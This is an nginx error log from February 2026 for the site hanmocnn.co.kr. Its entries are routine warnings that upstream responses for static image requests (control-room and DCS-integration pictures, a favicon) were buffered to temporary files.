2026/02/15 23:42:47 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/29/0000006298 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:43:03 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/29/0000006299 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:43:20 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/30/0000006300 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:43:29 [warn] 845#845: *27101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/30/0000006301 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:49:46 [warn] 845#845: *27202 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/30/0000006302 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:49:46 [warn] 845#845: *27202 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/30/0000006303 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:57:24 [warn] 851#851: *27218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/30/0000006304 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:57:24 [warn] 851#851: *27218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/30/0000006305 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:58:35 [warn] 851#851: *27218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/30/0000006306 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/15 23:59:36 [warn] 851#851: *27218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/30/0000006307 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 00:06:27 [warn] 850#850: *27252 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/30/0000006308 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 00:06:49 [warn] 850#850: *27252 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/30/0000006309 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 00:06:49 [warn] 850#850: *27252 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/31/0000006310 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 00:16:24 [warn] 853#853: *27282 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/31/0000006311 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 00:22:22 [warn] 854#854: *27292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/31/0000006312 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 00:24:54 [warn] 854#854: *27292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/31/0000006313 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 00:25:16 [warn] 854#854: *27292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/31/0000006314 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 00:25:26 [warn] 854#854: *27292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/31/0000006315 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 00:44:43 [warn] 856#856: *27352 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/31/0000006316 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 00:44:43 [warn] 856#856: *27352 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/31/0000006317 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 02:13:56 [warn] 849#849: *28969 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000007061 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 02:13:56 [warn] 849#849: *28969 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/06/0000007062 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:17:53 [warn] 854#854: *30686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/82/0000007824 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:18:04 [warn] 854#854: *30686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/82/0000007825 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:18:04 [warn] 854#854: *30686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/82/0000007826 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:19:53 [warn] 854#854: *30686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/82/0000007827 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:19:53 [warn] 854#854: *30686 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/82/0000007828 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:20:11 [warn] 854#854: *30729 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/82/0000007829 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:20:11 [warn] 854#854: *30729 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/83/0000007830 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:20:27 [warn] 854#854: *30729 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/83/0000007831 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:25:18 [warn] 855#855: *30748 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/83/0000007832 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:25:18 [warn] 855#855: *30748 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/83/0000007833 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:26:54 [warn] 855#855: *30748 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/83/0000007834 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:39:11 [warn] 855#855: *32284 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/57/0000008578 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:39:11 [warn] 855#855: *32284 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/57/0000008579 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:40:25 [warn] 855#855: *32284 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/58/0000008580 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:40:25 [warn] 855#855: *32284 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/58/0000008581 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:43:58 [warn] 855#855: *32316 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/58/0000008582 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:46:04 [warn] 855#855: *32327 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/58/0000008583 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:47:35 [warn] 855#855: *32338 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/58/0000008584 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:47:35 [warn] 855#855: *32338 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/58/0000008585 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:48:33 [warn] 855#855: *32338 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/58/0000008586 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:51:02 [warn] 855#855: *32366 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/58/0000008587 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 04:51:02 [warn] 855#855: *32366 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/58/0000008588 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 05:29:21 [warn] 855#855: *32388 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/58/0000008589 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 05:29:21 [warn] 855#855: *32388 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/59/0000008590 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 05:42:35 [warn] 855#855: *32425 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/59/0000008591 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:01:02 [warn] 860#860: *32462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/59/0000008592 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:05:35 [warn] 862#862: *32473 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/59/0000008593 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:05:35 [warn] 862#862: *32473 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/59/0000008594 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:15:25 [warn] 865#865: *32495 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/59/0000008595 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:21:20 [warn] 864#864: *32525 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/59/0000008596 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:21:20 [warn] 864#864: *32525 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/59/0000008597 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:21:28 [warn] 864#864: *32525 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/59/0000008598 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:30:54 [warn] 860#860: *32561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/59/0000008599 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:30:54 [warn] 860#860: *32561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/60/0000008600 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:34:38 [warn] 860#860: *34071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/34/0000009344 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:34:38 [warn] 860#860: *34071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/34/0000009345 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:37:05 [warn] 860#860: *34071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/34/0000009346 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:37:05 [warn] 860#860: *34071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/34/0000009347 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:41:39 [warn] 860#860: *34100 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/34/0000009348 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 06:41:39 [warn] 860#860: *34100 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/34/0000009349 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 08:40:37 [warn] 861#861: *34218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/35/0000009351 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 08:40:37 [warn] 861#861: *34218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/35/0000009352 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 08:40:37 [warn] 861#861: *34218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/35/0000009353 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 08:50:01 [warn] 865#865: *34234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/35/0000009354 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 08:50:01 [warn] 865#865: *34234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/35/0000009355 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 08:52:21 [warn] 865#865: *34246 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/35/0000009356 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 08:52:21 [warn] 865#865: *34246 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/35/0000009357 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
